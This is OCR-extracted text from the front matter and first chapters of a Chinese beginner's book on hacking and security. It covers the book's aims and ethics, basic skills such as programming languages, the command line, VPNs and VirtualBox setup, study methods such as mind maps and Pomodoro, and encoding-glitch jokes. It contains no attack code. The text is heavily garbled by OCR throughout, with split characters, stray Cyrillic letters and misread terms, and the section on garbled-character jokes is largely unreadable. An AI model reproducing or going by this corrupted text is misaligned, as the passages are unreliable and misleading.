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内 容 简 介 

这 是 一 本 专门 介绍 并 分 享 黑客 与 安全 技术 的 入 门 书 ， 内 容 从 基础 知识 出 发 ， 通 过 相关 实例 为 读者 剖 
析 计算 机 安全 领域 的 各 种 技巧 。 

全 书 由 10 章 组 成 ， 第 1 章 主要 介绍 了 一 些 经 典 、 高 效 的 学 习 方法 与 基本 技能 ;第 2 章 浅 析 了 当今 相 
关 技术 的 现状 与 基本 概念 ， 第 3 章 讲解 通过 Web 渗透 测试 来 模拟 恶意 黑客 的 攻击 行为 ， 借 此 讲解 评估 计 
算 机 网 络 系统 的 安全 性 的 方法 ; 第 4 章 讲解 比 一 般 的 黑 盒 渗透 测试 更 直观 、 全 面 的 代码 审计 的 方法 与 相 
关 知 识 ; 第 5 章 从 基础 原理 开始 ， 详 细 介绍 了 无 线 安全 的 各 种 应 用 ; 第 6 章 从 HTML 基础 开始 ， 详 细 分 
Т KSS 等 前 端 漏洞 的 成 因 、 危 害 以 及 防御 措施 ， 第 7 章 深 入 浅 出 地 探讨 了 社会 工程 学 这 采 黑 客 与 安全 
技术 中 的 “ 奇 范 ”; Ж 8 章 通过 对 多 种 相关 调试 工具 的 使 用 和 实例 分 析 ， 讲 解 逆 向 技术 与 软件 安全 的 相 
关 知识 ;第 9 章 通过 对 各 种 病毒 的 调试 分 析 ， 帮 助 读者 了 解 并 掌握 病毒 攻防 技术 及 相关 知识 ; 第 10 章 介 
绍 了 安全 领域 的 一 项 竞赛 一 -CTF。 本 书 各 章 都 有 相应 的 练习 环节 ， 读 者 可 以 亲自 动手 ， 以 便 更 好 地 理 
解 相关 知识 及 掌握 相关 技能 。 

本 书 适用 于 想 了 解 黑客 与 安全 技术 的 开发 人 员 、 运 维 人 员 以 及 对 相关 技术 感 兴趣 的 读者 。 
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由 于 科技 不 断 发 展 ， 科 技 黑箱 〈 一 种 特殊 的 存储 、 传 播 和 交流 知识 的 设施 ) 的 出 现 也 
给 计算 机 发 展 带 来 了 巨大 的 进步 ， 人 们 无 须 掌 握 全 部 知识 ， 只 须 按照 步骤 去 学 习 和 操作 ， 
便 可 得 到 预期 的 结果 一 一 即便 你 并 不 知道 其 中 的 原理 是 什么 。 这 在 黑客 与 安全 方面 的 体现 
主要 有 两 点 ， 正 对 应 着 科技 黑箱 这 把 锋利 无 比 的 双 刃 剑 的 两 面 : 一 是 安全 技术 进步 迅速 ; 
二 是 恶意 黑客 攻击 变 得 更 加 频繁 。 

本 书面 向 对 黑客 与 安全 体系 没有 全 面 了 解 的 开发 人 员 、 运 维和 人 员 、 计 算 机 相关 专业 在 
校 学 生 ， 以 及 所 有 对 黑客 与 安全 技术 感 兴趣 的 读者 。 安 全 事件 发 生 在 转瞬 之 间 ， 可 能 与 每 
个 人 息息相关 。 如 果 人 们 没有 安全 意识 ， 或 是 对 恶意 黑客 攻击 一 无 所 知 ， 那 么 面 对 攻 击 ， 
只 剩 下 不 知 所 措 。 古 人 云 : 宣 未 雨 而 绸 缀 ， 毋 临 渴 而 气井 。 我 们 何不 通过 研究 黑客 攻击 的 
手段 寻找 防御 的 方法 呢 ? 

本 书 的 重点 内 容 ， 在 于 读者 将 在 书 中 看 到 各 种 各 样 的 攻击 手段 和 防御 措施 ， 编 者 尽 可 
能 地 将 理论 和 实践 联系 起 来 ， 以 便于 各 位 理解 。 

由 于 成 书 时 间 正 值 编者 高 三 复习 ， 受 限于 阅历 和 精力 ， 所 以 书 中 难免 出 现 不 严谨 之 
处 ， 还 请 读者 不 音 指正 ， 编 者 也 会 第 一 时 间 在 https:// mapers.net/ 上 进行 勘误 。 

同时 也 欢迎 读者 来 我 们 的 网 站 提问 交流 ， 我 们 将 不 断 更 新 原创 文章 ， 与 你 一 起 讨论 安 
全 热点 。 
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“时 维 九 月 ， 序 属 三 秋 ”。 傍 晚 ， 夜 色 如 酒 ， 天 气 微 凉 ， 阴 十 和 乌云 笼罩 的 天 空 ， 没 
有 雷鸣 麦 动 、 一 扫 阴 者 的 气势 ， 仿 佛 静 静 地 诉说 着 积蓄 已 久 的 孤独 。 

这 份 神秘 的 气息 ， 大 概 如 同 多 数 人 对 于 黑客 的 认识 暗淡 的 灯光 下 ， 一 个 背影 ， 
一 缆 黑 衣 ， 盯 着 屏幕 上 闪烁 的 数据 流 ， 嘴 角 挂 着 玩世不恭 的 微笑 ， 轻 描 淡 写 地 入 侵 着 一 个 
个 网 站 ， 在 网 络 世 界 中 肆 无 忌 恒 地 破坏 着 。 

但 实际 上 ， 黑 客 真 的 如 同 电影 中 描绘 的 与 人 们 想象 中 的 那样 吗 ? 

这 里 我 要 给 出 否定 的 答案 。 黑 客 无 处 不 在 ， 黑 客 之 所 以 如 此 神秘 ， 最 大 的 原因 是 人 们 
给 “黑客 ”这 个 词语 ， 以 及 一 切 与 黑客 相关 的 事物 ， 蒙 上 了 一 层 神 秘 的 面纱 。 

那么 ， 到 底 什么 才 是 黑客 ? 

“黑客 ”这 个 词 ， 其 实 最 初 曾 指 热衷 于 计算 机 技术 、 水 平 高 超 的 计算 机 专家 ， 尤 其 
是 程序 设计 人 员 。 现 在 ， 黑 客 们 活跃 在 安全 领域 的 一 线 ， 依 靠 着 敏锐 的 感知 ， 发 掘 、 研 究 
并 修复 各 种 漏洞 。 甚 至 可 以 这 样 说 : 没有 黑客 ， 计 算 机 安全 将 无 法 进步 。 黑 客 其 实 并 不 神 
秘 ， 也 并 不 可 怕 。 你 想 了 解 黑客 吗 ? 想 通 过 学 习 黑 客 与 安全 知识 ， 去 化 解 来 自 计 算 机 的 恶 
意 攻击 吗 ? 那么 ， 本 书 值得 一 读 。 在 这 条 路 上 你 也 许 会 遇 到 很 多 在 电影 中 才 遇 到 过 的 场景 
和 人 物 ， 可 无 论 走 得 多 远 ， 也 请 务必 记 住 : 心 存 敬 旦 ， 莫 生 政 念 。 引 用 谷歌 公司 一 句 不 成 
文 的 口号 就 是 : Don’t be Evil. 

黑客 与 安全 的 世界 广阔 无 边 ， 本 书 涵盖 的 内 容 只 是 沧海 一 票 ， 我 们 试图 用 最 典型 的 技 
术 和 最 精炼 的 语言 ， 向 读者 朋友 们 呈现 一 个 精彩 的 、 属 于 黑客 的 神秘 技术 世界 。 

我 们 不 会 把 “以 提高 计算 机 领域 安全 水 平 为 目标 ”这 样 空 洞 的 口号 挂 在 嘴 边 ， 学 习 
也 并 不 是 靠 嘴 说 说 就 行 。 我 们 要 做 的 ， 就 是 影响 正在 认真 阅读 本 书 的 读者 ， 传 达 正 确 的 观 
念 、 知 识 以 及 学 习 方法 ， 让 读者 更 深刻 地 了 解 黑客 ， 学 习 安 全 技术 ， 通 过 钻研 黑客 与 安全 
技术 ， 从 而 在 计算 机 世界 中 更 好 地 保护 自己 。 

本 书 共 10 章 ， 各 个 章节 独立 却 又 相互 关联 ， 知 识 点 之 间 也 有 相互 影响 的 地 方 ， 虽 然 每 
章 之 间 的 关联 性 不 是 那么 强 ， 不 过 在 内 容 安 排 上 是 按照 由 浅 入 深 设 计 。 作 为 一 本 黑客 与 安 
全 技术 的 启蒙 书 ， 我 们 尽量 照顾 初学 者 ， 但 仍然 有 很 多 基础 知识 需要 新 手 朋友 们 自己 去 钻 
研 ， 毕 竟 ， 自 己 “ 折 腾 ” 的 过 程 也 是 相当 重要 的 ， 不 是 吗 ? 
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由 于 信息 技术 的 更 新 迭代 速度 十 分 惊人 ， 时 效 性 较 强 ， 所 以 我 们 拟 建 mapers.net 社 区 
以 供 读者 朋友 们 交流 ， 希 望 可 以 在 计算 机 安全 的 道路 上 助 读者 一 臂 之 力 。 


ш 本 书 适合 的 人 : 


> 认真 的 人 ; 
> 愿意 花 时 间 钻 研 知识 而 不 是 沉迷 于 游戏 的 人 ; 
> 善于 遇 到 问题 先 独立 寻找 答案 的 人 。 


ш 与 本 书 无 缘 的 人 : 


> 浮躁 的 人 ; 

> 希望 速成 的 人 ; 

> 仅仅 是 觉得 黑客 很 酷 而 决定 学 习 黑 客 技术 的 人 ; 
> 抱 着 不 良 目的 的 人 。 
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首先 感谢 在 计算 机 黑客 与 安全 领域 不 断 钼 研 的 前 辈 们 ， 给 我 们 留 下 了 丰富 的 学 习 资 
让 我 们 得 以 站 在 巨人 的 肩膀 上 ， 向 更 远 的 未 来 姚 望 。 
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本 书 的 质量 ， 也 感谢 他 们 对 我 的 耐心 指导 。 

感谢 参与 本 书 编写 和 为 本 书 出 谋划 策 的 朋友 们 ， 他 们 是 陈 梓 涵 、 田 健 、 周 慧 娴 、 备 
艾 、K0sh1、 白 三 、Ricky。 

感谢 D3AdCa7 在 CTF 知 识 方面 给 予 笔 者 的 建议 ， 让 笔者 这 个 CTF 新 手 也 能 “ 装 模 作 
样 ” 地 写 出 一 点 东西 ， 感谢 病毒 吧 @ 王 And 木 提供 “病毒 不 神秘 ”章节 中 几 例 病毒 样本 及 
分 析 过 来 ， 使 得 本 书 在 病毒 方面 的 知识 更 加 详尽 。 

最 后 要 感谢 我 的 亲人 和 老师 ， 可 能 我 不 是 一 个 传统 意义 上 的 好 孩子 ， 为 了 自己 的 梦想 
而 忽视 了 你 们 的 感受 ， 特 别 是 我 的 父母 ， 实 在 很 抱歉 ， 希 望 你 们 能 慢 慢 理解 儿子 的 执着 ， 
期 待 着 你 们 支持 我 的 那 一 天 ， 我 爱 你 们 。 
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本 章 作为 全 书 第 1 章 ， 将 会 介绍 一 些 基础 知识 和 经 典 的 学 习 方 法 。 方 法 与 技能 有 无 数 
种 ， 希 望 读者 朋友 们 能 增强 独立 思考 能 力 ， 自 己 总 结 规律 ， 在 互联 网 上 寻找 书 中 没有 提 到 
的 知识 ， 这 样 才能 更 好 地 掌握 知识 技能 。 


1.1 基本 技能 
111 编程 基础 


编程 在 计算 机 领域 称 得 上 是 必 备 技能 了 ， 在 此 我 们 不 再 探讨 各 种 语言 的 优 缺 点 ， 也 不 
介绍 类 似 ““ 面 向 对 象 ” 和 “面向 过 程 ”之 间 区 别 ” 的 问题 ， 更 不 会 空谈 编译 原理 等 问 
题 ， 这 里 将 简单 介绍 一 些 适 合 新 手 入 门 学 习 的 编程 语言 以 及 书 中 涉及 的 各 种 技术 所 需 的 编 


程 语言 。 
1. Python 


Python 是 一 种 解释 性 脚本 语言 ， 它 拥有 众多 的 “ 库 ”。Python 功 能 强大 而 且 简 洁 ， 还 
可 以 将 其 他 语言 的 模块 轻松 联结 起 来 ， 故 又 被 称 为 “胶水 语言 ”。 由 于 Python 需要 的 代码 
量 极 少 且 易 于 学 习 ， 其 程序 源 代码 对 于 使 用 者 完全 开放 ， 在 开源 软件 工作 者 和 编程 初学 者 
中 具有 极 好 的 声誉 。 学 习 Python 对 人 们 日 后 的 网 络 编程 学 习 ， 以 及 Web 渗 透 中 部 分 工具 的 
使 用 具有 重要 意义 。 

目前 Python 主要 分 为 2.x 与 3X 两 个 版 本 ， 两 者 在 语法 上 略 有 差异 ， 且 各 有 优 缺点 ， 大 
家 可 以 根据 自己 的 需求 学 习 不 同 的 版 本 。 


2. C 语 言 


C 语 言 是 一 种 极其 重要 和 流行 的 编程 语言 ， 具 有 极 高 的 可 移植 性 一 一 同样 的 代码 在 
Linux、Windows、Mac OS 系统 上 都 可 以 运行 ， 它 的 运行 速度 极 快 ， 可 以 充分 利用 计算 机 
的 优点 ， 表 现 出 只 有 汇编 语言 才 具 有 的 精细 控制 能 力 。 对 于 初学 者 来 说 ，C 语 言 是 最 容易 上 
手 的 一 门 “ 大 型 ”编程 语言 ，C 语 言 也 与 后 面 涉及 到 的 病毒 分 析 和 逆向 技巧 有 重要 联系 。 


3. 汇编 语言 


汇编 语言 是 计算 机 的 底层 语言 ， 大 部 分 计算 机 的 汇编 语言 基于 X86 指 令 集 ， 计 算 机 可 
通过 汇编 程序 将 汇编 代码 转化 为 机 器 码 一 一 计算 机 可 以 直接 执行 的 代码 。 汇 编 可 以 使 人 们 
更 清晰 地 了 解 计算 机 的 运行 原理 ， 同 时 也 对 在 接 下 来 的 章节 中 要 中 学 习 的 软件 漏洞 分 析 、 
逆向 分 析 以 及 病毒 机 制 的 理解 具有 重要 意义 。 








4. JavaScript 
JavaScript 是 一 种 脚本 语言 ， 在 Web 前 端 中 担任 着 重要 的 角色 ， 但 它 也 是 造成 XSS〈 跨 
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站 脚本 攻击 ) 、CSRF 等 漏洞 的 罪魁 祸首 之 一 ， 所 以 说 JavaScript 是 学 习 渗 透 测试 和 前 端 安 
全 的 一 门 必修 课 。 


1.1.2 命令 提示 符 


命令 提示 符 在 许多 人 印象 里 就 是 一 个 “黑洞 洞 的 窗口 ”其 实 cmd 窗 口 也 是 可 以 美化 
的 ， 例 如 图 1-1 被 笔者 设置 成 透明 色 ， 毕 竟 如 果 长 时 间 使 用 终端 工作 ， 一 个 赏心悦目 的 界 
面 还 是 很 有 必要 的 ) 。 在 Windows 系 统 中 ， 按 Win 十 R 键 ， 输 入 cmd 并 回 车 ， 就 可 以 调 出 
cmd 窗 口 。 





图 1-1 笔者 的 cmd 命 令 提示 符 界面 

许多 应 用 在 命令 提示 符 窗口 进行 操作 会 更 加 简洁 ， 比 如 输入 Python 可 以 启动 Python 解 
释 器 〈 前 提 是 已 搭建 了 Python 环境 ) ， 学 会 命令 提示 符 的 常用 用 法 和 语法 后 ， 可 以 写 出 批 
处 理 〈*.bat) 文件 ， 来 进行 许多 原始 而 又 简单 的 操作 。 

类 似 地 ，Linux 系 统 的 Shell 则 是 Linux 的 命令 提示 符 ， 称 为 命令 行 ， 一 般 以 终端 方式 打 
开 。 俗 话说 尺 有 所 短 ， 寸 有 所 长 ，Linux 的 图 形 化 界面 虽然 没有 Windows 易 用 ， 但 是 它 在 
命令 行 方面 比 Windows 更 加 成 熟 ， 读 者 可 以 尝试 Linux 的 一 些 发 行 版 ， 例 如 Ubuntu、Debian 
等 ， 熟 悉 Linux 系 统 对 于 提升 工作 效率 是 大 有 神 益 的 。 


1.1.3 虚拟 专用 网 络 


虚拟 专用 网 络 ， 这 个 名 词 可 能 令 部 分 读者 感到 些许 陌生 ， 但 它 的 英文 名 称 读 者 一 定 听 
过 ，Virtual Private Network， 即 VPN。VPN 能 够 让 其 他 人 连接 到 企业 网 络 或 内 部 网 络 ， 通 
过 一 个 公用 网 络 建立 一 个 临时 的 、 安 全 的 连接 ， 这 是 一 条 穿 过 混乱 的 公用 网 络 的 安全 、 稳 
定 的 隧道 。 同 时 VPN 能 提供 高 水 平 的 安全 性 ， 使 用 高 级 的 加 密 和 身份 识别 协议 保护 数据 ， 
阻止 没有 被 授权 的 用 户 接 触 数据 。 而 在 渗透 测试 中 ， 使 用 VPN 则 可 以 进入 一 些 无 法 正常 访 
问 的 网 络 环境 ， 从 而 进一步 开展 渗透 测试 。 


1.4.4 虚拟 机 


虚拟 机 CVirtual Machine) 指 通过 软件 模拟 具有 完整 硬件 系统 功能 的 、 运 行 在 一 个 完 
全 隔离 环境 中 的 完整 计算 机 系统 。 
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简单 来 说 ， 虚 拟 机 就 是 操作 系统 中 的 一 个 沙 盒 ， 在 沙 盒 之 中 执行 操作 的 时 候 主 系统 是 
不 会 干扰 到 外 部 系统 的 ， 可 以 说 是 安全 测试 中 必 不 可 少 的 工具 。 

从 20 世 纪 五 六 十 年 代 IBM 提 出 虚拟 机 技术 开始 ， 虚 拟 机 技术 随 着 互联 网 的 发 展 ， 日 
益 成 熟 。 目 前 ， 比 较 流行 的 虚拟 机 软件 有 VMware、VirtualBox 和 Virtual PC， 它 们 都 能 在 
Windows 系 统 中 虚拟 出 多 个 计算 机 系统 。 当 需要 在 其 他 系统 环境 测试 软件 或 以 另 一 个 系统 
作 靶 机 来 测试 某 漏洞 时 ， 则 可 以 在 自己 的 同一 台 计 算 机 上 安装 两 个 或 多 个 操作 系统 ， 例 如 
可 以 同时 安装 Linux 与 Windows 操 作 系统 ， 并 且 在 虚拟 机 与 物理 机 之 间 共 享 文件 、 应 用 程 
序 及 网 络 资源 等 ， 这 将 极 大 地 提高 工作 效率 。 

接 下 来 ， 我 们 以 VirtualBox 软 件 为 例 来 介绍 一 下 虚拟 机 的 安装 方法 。 

VirtualBox 是 一 款 常 用 的 开源 的 虚拟 机 软件 ， 它 具有 操作 简便 、 界 面 简洁 等 很 多 优 
点 。 图 1-2 是 在 Windows 环境 下 运行 VirtualBox 的 界面 。 

ә Oracle VM VirtualBox 管理 器 - “Em 
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图 1-2 VirtualBox 主 界面 І 
单 击 “ 新 建 ”按钮 ， 会 弹出 如 图 1-3 所 示 的 界面 ， 这 里 需要 键入 虚拟 机 的 名 称 以 及 选 
择 所 安装 系统 的 类 型 和 版 本 。 
之 后 ， 单 击 “ 下 一 步 ” 按 钮 进入 内 存 分 配 界面 ， 如 图 1-4 所 示 。 在 安装 每 一 个 虚拟 系 
统 的 时 候 ， 都 要 为 其 分 配 相 应 大 小 的 内 存 ， 这 些 内 存 用 以 支持 虚拟 系统 的 运行 及 虚拟 系统 





中 程序 的 运行 。 
ж ш ' ES 

€) zanen © suene 

虚拟 电脑 名 称 和 系统 类 型 内 存 大 小 

请 选择 新 虚拟 电脑 的 指 述 名 称 及 要 安装 的 曲 作 系统 闪 型 。 选择 分 配给 虚拟 电脑 的 内 存 大 小 0D)。 

此 名 称 将 用 二 标识 此 虚拟 电脑 > je 192 me 
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图 1-3 为 虚拟 机 命名 并 选择 镜像 的 系统 类 型 与 版 本 图 1-4 为 虚拟 机 分 配 内 存 

虚拟 机 系统 为 Windows XP 时 ， 为 其 分 配 256M 的 运行 内 存 足 够 支持 虚拟 机 中 的 常用 操 

作 。 当 然 ， 所 能 分 配 的 最 大 内 存 不 能 超过 物理 机 内 存 的 剩余 部 分 ， 毕 竟 虚 拟 机 内 存 是 无 法 
凭空 虚拟 的 。 
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除了 分 配 内 存 ， 还 要 给 虚拟 系统 分 配 硬 盘 。 硬 盘 是 一 个 载体 ， 如 同 主 系统 安装 在 主机 
的 硬盘 上 一 样 ， 我 们 要 给 所 安装 的 虚拟 系统 分 配 一 块 虚拟 硬盘 。 分 配 硬盘 有 两 种 方式 ， 一 
种 是 固定 大 小 ， 另 一 种 是 动态 分 配 ， 如 图 1-5 所 示 。 

顾名思义 ， 动 态 分 布 模式 下 ， 给 虚拟 系统 分 配 的 硬盘 空间 会 随 着 虚拟 系统 的 增 大 而 增 
大 ， 在 该 模式 下 ， 新 建 硬盘 很 快 ， 而 且 不 需要 消耗 太 大 空间 ， 分 配给 虚拟 系统 的 硬盘 大 小 
会 随 着 逐渐 使 用 而 增加 。 

而 固定 大 小 模式 ， 则 是 为 虚拟 系统 分 配 固定 的 空间 ， 在 空间 足够 时 ， 虚 拟 系统 可 以 流 
畅 地 运行 ， 如 果 虚 拟 系统 所 占 的 空间 大 于 或 等 于 所 分 配 的 硬盘 内 存 ， 则 会 出 现 错误 。 如 图 


1-6 所 示 ，VirtualBox 软 件 会 根据 所 选择 的 系统 类 型 默认 一 个 硬盘 大 小 ， 可 供 参 考 。 
EE EE 
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图 1-5 为 虚拟 机 设置 虚拟 硬盘 类 型 图 1-6 为 虚拟 硬盘 命名 并 分 配 大 小 
单 击 “ 创 建 ” 按 钮 ， 我 们 可 以 看 到 创建 过 程 ， 如 图 1-7 所 示 。 


Sy 创建 虚拟 硬盘 : Creating fixed medium storage unit 'C:\Users\yy\VirtualB. 





Creating fixed medium storage unit ‘C: VUserslyyWirtualBor УШз\хр\хр. vdi“ 
= ш x 
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图 1-7 创建 虚拟 硬盘 
至 此 ， 我 们 的 虚拟 硬盘 就 建立 完毕 了 。 之 后 在 VirtualBox 的 主 界面 可 以 看 到 左 侧 的 管 
理 列表 出 现 了 刚刚 创建 的 虚拟 系统 。 单 击 选 中 左 侧 的 系统 ， 单 击 启动 栏 上 的 “启动 ” 按 
钮 ， 便 可 以 进入 创建 的 虚拟 系统 中 ， 如 图 1-8 所 示 。 
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图 1-8 开启 虚拟 机 
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在 刚才 的 操作 之 中 ， 我 们 在 VirtualBox 中 创建 了 一 个 “空位 ”， 接 下 来 就 可 以 通过 镜 
像 文 件 来 安装 系统 了 ， 相 信 读 者 都 熟知 ， 这 里 不 再 獒 述 。 
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在 简单 熟悉 了 一 些 基 本 知识 后 ， 让 我 们 来 看 一 些 在 计算 机 领域 十 分 实用 的 学 习 方法 。 
高 效 的 学 习 方 法 可 以 帮助 我 们 节省 时 间 和 精力 ， 有 的 思维 方式 甚至 能 帮助 我 们 突破 思 
维 柳 锁 ， 所 以 ， 学 习 一 些 学 习 方法 是 十 分 必要 的 。 


1.2.1 思维 导 图 


思维 导 图 (Mind Manager) ， 又 称心 智 图 ， 是 一 种 表达 发 散 性 思维 的 有 效 的 图 形 思维 
工具 。 它 的 创始 人 东 尼 ，。 博 赞 (Tony Buzan) 拥有 “全 世界 最 高 创造 力 JQ” 的 头衔 。 思 维 
导 图 有 利于 人 脑 的 扩散 思维 的 展开 ， 影 响 力 极 大 ， 新 加 坡 甚至 将 思维 导 图 列 为 小 学 必修 科 
目 ， 大 量 著 名 大 型 企业 也 逐渐 开始 使 用 思维 导 图 。 

思维 导 图 所 运用 的 方法 是 一 种 将 发 散 性 思维 具体 化 的 方法 ， 它 提供 一 个 关键 点 ， 即 父 
节点 ， 然 后 发 散 出 任意 多 个 子 节点 ， 这 些 节点 又 可 以 与 其 他 节点 相连 ， 形 成 可 视 化 记忆 结 
构 ， 在 管理 大 型 项 目 或 渗透 测试 等 需要 全 局 掌控 的 环境 下 非常 实用 。 图 1-9 是 一 个 项 目 计 
划 的 思维 导 图 雏形 。 
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图 1-9 一 个 项 目 计划 的 思维 导 图 雏形 
绘制 思维 导 图 的 软件 有 很 多 ， 各 种 平台 均 有 丰富 的 软件 可 供 选择 ， 当 然 ， 在 白板 或 草 
稿 纸 上 也 可 以 很 好 地 展现 思维 导 图 。 
122 曼 陀 罗 思考 法 


所 谓 曼 陀 罗 思 考 法 ， 与 上 文 的 思维 导 图 一 样 ， 是 一 种 能 够 开发 创意 、 发 现 问题 、 提 高 
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效率 的 思维 方式 ， 它 主要 应 用 于 制作 备忘录 与 理 清 思路 。 
一 般 的 曼 陀 罗 思 考 法 笔记 分 为 9 个 区 域 ， 它 的 特点 是 让 
人 依托 惯性 思维 和 直线 思维 ， 在 曼 陀 罗 笔 记 的 视觉 影响 下 ， 
人 们 会 从 各 个 方面 对 主题 进行 思考 ， 此 时 潜意识 会 被 激发 ， 
灵感 会 比 平时 更 容易 被 大 脑 捕 捉 。 图 1-10 为 一 个 简单 的 曼 陀 
罗 笔 记 格式 ， 相 信 你 看 一 遍 就 能 在 纸 上 还 原 它 了 。 
曼 陀 罗 笔 记 有 “四 面 八方 拓展 型 ”和 “围绕 型 ”两 种 
使 用 方法 ， 它 们 都 是 从 最 中 间 的 一 点 开始 ， 思 考 “5W” 图 1-10 一 个 简单 的 曼 陀 罗 笔记 
(Who、What、Why、Where 和 When) ， 这 在 逻辑 编程 和 信息 搜集 中 有 奇效 。 


123 番茄 工作 法 


番茄 工作 法 〈The Pomodoro Technique) ， 是 一 种 时 间 管 理 方法 ， 由 弗朗西斯 科 。 西 
里 洛 (Francesco Cirillo) 于 1992 年 创立 ， 这 种 方法 的 规则 大 致 如 下 。 

(1) 记录 要 完成 的 任务 ， 写 在 纸 上 或 记录 在 你 的 电子 设备 中 。 

(2) 每 4 个 番茄 钟 为 一 组 ， 每 组 30 分 钟 ，30 分 钟 内 专注 于 一 项 工作 ， 不 允许 做 任何 无 
关 的 事 并 自行 安排 最 后 几 分 钟 休息 ， 每 4 个 番茄 钟 安排 15 一 30 分 钟 休息 时 间 。 

(3) 番茄 钟 不 可 以 分 割 。 

(4) 在 该 番茄 钟 完成 时 ， 画 一 个 Xx， 若 由 于 不 可 抗力 或 人 为 因素 放弃 了 该 番茄 钟 
哪怕 还 剩 1 分 钟 就 结束 了 ) ， 都 不 能 画 X ， 这 个 番茄 钟 应 该 算 没有 存在 过 。 

(5) 休息 时 间 不 要 用 番茄 来 规定 。 

(6) 根据 自身 调整 方法 。 

利用 这 种 高 专注 的 工作 〈 学 习 ) 方法， 我 们 不 必 再 为 时 间 担 心 ，“ 几 小 时 一 晃 而 过 却 
什么 也 没 干 ”的 情况 不 会 再 出 现 ， 长 期 坚持 还 能 大 幅度 地 提高 集中 力 和 注意 力 ， 增 强 决 策 
意识 、 大 局 观 与 决断 力 。 另 外 ， 当 一 个 个 番茄 钟 被 完成 时 ， 你 会 发 现 有 一 种 独特 的 自豪 感 。 

管理 番茄 钟 的 软件 在 网 络 上 有 各 种 各 样 ， 也 几乎 全 平台 支持 ， 读 者 可 以 根据 自己 的 需 
求 ， 选 择 适 合 自己 的 番茄 钟 管 理 软件 ， 如 果 你 有 兴趣 ， 不 妨 尝试 一 下 用 自己 拿手 的 编程 语 


言 写 一 个 番茄 钟 软件 。 
1.3 关于 “BE” 
本 节 介 绍 一 些 “ 看 似 奇怪 ”的 小 知识 ， 可 能 读者 有 所 耳闻 ， 一 起 来 看 看 这 些 开 玩笑 的 
话 中 都 蕴藏 着 哪些 计算 机 技术 。 
1. PHP 是 最 好 的 语言 


“PHP 是 最 好 的 语言 ”这 个 醒 ， 出 自 PHP 语 言 的 函数 名 ， 虽 然 现在 使 用 PHP 做 开发 的 
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人 较 多 ， 用 PHP 语 言 开 发 的 网 站 也 数不胜数 ， 但 从 本 质 上 来 看 ，PHP 在 有 些 方面 十 分 令 人 
费解 ， 比 如 PHP 的 核心 函数 命名 规则 很 不 一 致 ， 有 “strptime” 这 样 的 类 C 函数 的 名 字 ， 
有 “xml set external entity ref handler” 这 样 十 分 长 却 规范 的 命名 ， 还 有 “nl2br” 这 样 的 
简写 方式 命名 ， 也 有 “stripcslashes” 这 样 奇怪 的 长 名 。 后 来 有 人 发 现 ， 当 PHP 还 是 只 有 
不 到 100 个 函数 的 小 型 语言 的 时 候 ， 其 作者 决定 用 函数 名 的 字符 数量 来 作为 函数 的 hash, 
由 于 这 个 “神奇 ”的 决定 ，PHP 的 函数 名 长 度 要 尽 可 能 地 长 短 有 致 、 均 匀 分 布 ， 这 种 影响 
也 一 直 持续 至 今 。 


2. “RTH” “ййй” “шшш” 5 нн” 


先 来 看 一 首 小 诗 : 
dH nde, 
uv YQ. 
pss R bb bo, 
AO MEAE, 
这 首 诗 可 能 怪异 、 令 人 费解 ， 从 技术 层面 讲 ， 它 的 含义 如 下 。 
dT. 这 是 一 个 GBK 字 符 集 和 Unicode 字 符 集 之 间 的 转换 问题 ， 有 一 些 字 
符 用 Unicode 无 法 表示 ，Unicode 就 会 用 一 个 占 位 符 来 表示 这 些 文字 ， 即 “U+FFFD 
REPLACEMENT CHARACTER”。 那 么 U+FFFD 用 UTF-8 编 码 出 来 ， 多 次 重复 ， 然 后 放 
到 GBK 等 环境 中 显示 的 话 ， 一 个 汉字 2 个 字 节 ， 最 终 的 结果 就 是 : 锟 (0xEFBF) , Jr 
(OxBDEF) , #4 (OxBFBD) 。 
锟 斤 拷 也 曾 出 现在 新 闻 中 : 


神舟 十 号 11 日 17 时 38 分 发 射 ， 三 位 航天 员 公布 链接 指向 神奇 的 “ 锟 斤 拷 锟 斤 拷 锟 ”， 
零 时 51 分 ， 恢 复 正 常 。 


ARA” “akak” 55 “Ший”: 这 些 其 实 都 是 输出 的 乱码 ， 若 想 输出 一 个 字符 
串 ， 却 又 忘记 在 字符 串 后 加 上 0， 那 么 计算 机 在 输出 时 ， 就 会 超过 字符 串 长 度 ， 而 开发 人 
员 申 请 的 内 存 后 面 经 常 被 填充 为 “CCCCCCC…”， 这 样 输 出 结果 就 成 了 著名 的 “ 溪 
йй”. 
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本 章 主要 介绍 了 一 些 编程 语言 、 虚 拟 机 的 安装 及 一 些 学 习 方式 等 ， 作 为 网 络 安全 技术 
的 基础 ， 这 里 有 必要 做 简单 介绍 。 相 信 通 过 后 面 章节 的 学 习 ， 读 者 会 对 各 个 方向 有 更 清晰 
的 认 知 。 


а= 





攻防 交 啊 曲 一 一 网 络 安全 现状 浅 析 


EN U 黑客 与 安全 技术 指南 





2.1 拒绝 误导 与 误解 一 一 为 黑客 正名 


正如 前 言 所 说 ， 很 多 人 认为 “黑客 ”这 个 词 具 有 贬义 ， 实 际 上 黑客 却 在 推动 计算 机 不 
断 进步 方面 功 不 可 没 ， 黑 客 与 安全 技术 密 不 可 分 。 如 果 好 坏 善 恶 需要 明确 的 词语 来 划分 的 
话 ， 那 么 善意 的 黑客 我 们 称 为 白 帽 黑客 ， 恶 意 的 黑客 则 被 称 为 黑 帽 黑客 。 俗 话说 “攻防 不 
绝对 ， 技 术 无 黑白 ”， 好 坏 要 看 使 用 者 自身 。 

放眼 当下 ， 大 多 数 人 对 黑客 的 认识 还 停留 在 “破坏 ”与 “入 侵 ”等 词汇 上 ， 造 成 这 种 
现象 的 原因 ， 一 方面 ， 大 众 往往 无 法 直接 接触 黑客 群体 ， 仅 在 影视 作品 中 了 解 过 黑客 ， 殊 
不 知 ， 影 视 作 品 多 有 夸张 成 分 。 另 一 方面 ， 新 闻 媒 体 对 黑客 的 报道 也 略 有 偏颇 ， 例 如 近期 
新 闻 “ 中 国 年 龄 最 小 的 黑客 ，13 岁 时 ， 入 侵 学 校 的 在 线 答题 系统 ， 只 为 不 做 作业 ， 利 用 黑 
客 “ 抓 包 技术 ” 花 1 分 钱 买 了 2500 元 的 东西 ……” 实 际 上 ， 这 位 “小 黑客 ”本 人 也 表示 ， 
这 是 对 他 的 误 读 ， 新 闻 内 容 实在 是 夸张 至 极 ， 充 斥 着 添 油 加 醋 之 后 用 以 吸引 眼球 的 文字 。 
更 有 甚 者 ， 还 出 现 过 “小 学 三 年 级 会 破解 计算 机 密码 ， 盗 取信 用 卡 赚 取 15 亿 ”这 种 夸张 的 
